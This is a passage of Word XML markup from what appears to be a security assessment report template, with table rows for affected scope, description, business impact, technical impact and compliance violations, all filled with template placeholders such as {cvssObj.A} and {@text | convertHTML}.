            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>cvssObj.A</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="631E4C8E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000124" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>Affected scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="8682" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000125" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">{@affected | </w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>convertHTML</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="1C6BD51B" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000012A" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="8682" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000012B" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#description}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000012C" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t xml:space="preserve">{@text | </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>convertHTML</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000012D" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000012E" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{%image}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000012F" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Image </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> – {caption}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000130" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000131" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/description}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="6FDB2766" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000136" w14:textId="45274F68">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:pBdr>
                <w:top w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:left w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:bottom w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:right w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
                <w:between w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="8682" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="5C55A7A2" w14:textId="55A9AD49">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#businessimpact}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:textId="77777777" w14:paraId="7F444880">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{@text | convertHTML}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:textId="77777777" w14:paraId="2670EE64">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:textId="77777777" w14:paraId="787196CE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{%image}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:textId="77777777" w14:paraId="1EF7F88F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Image </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> – {caption}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:textId="77777777" w14:paraId="4FC54314">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="38E4A2DC" w14:textId="7CB2D768">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>businessimpact</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000013D" w14:textId="4DC17679">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="24C78D91">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="7942CCDF" w14:textId="35AC8C97">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>Technical Impact(may not work)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="8682" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="3BD63E4B" w14:textId="4CCCB74D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#technicalimpact}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="30C7C0BE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{@text | convertHTML}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="27AB0217">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{#images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="5C4BD1EB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>{%image}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="1F59A3EB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve">Image </w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> – {caption}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="20AAD8C7">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/images}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="591B6BE4" w14:textId="3C0D8D4C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="0"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>{/</w:t>
            </w:r>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>technicalimpact</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2FBCE143" w:rsidTr="2FBCE143" w14:paraId="58CAD692">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1524" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="218D3F73" w14:textId="30FF0168">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:smallCaps w:val="1"/>
              </w:rPr>
              <w:t>Compliance violations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="8682" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="2FBCE143" w:rsidP="2FBCE143" w:rsidRDefault="2FBCE143" w14:paraId="4F3DBB9C" w14:textId="62A399A1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:left w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:bottom w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:right w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
                <w:between w:val="nil" w:color="000000" w:sz="0" w:space="0"/>
              </w:pBdr>
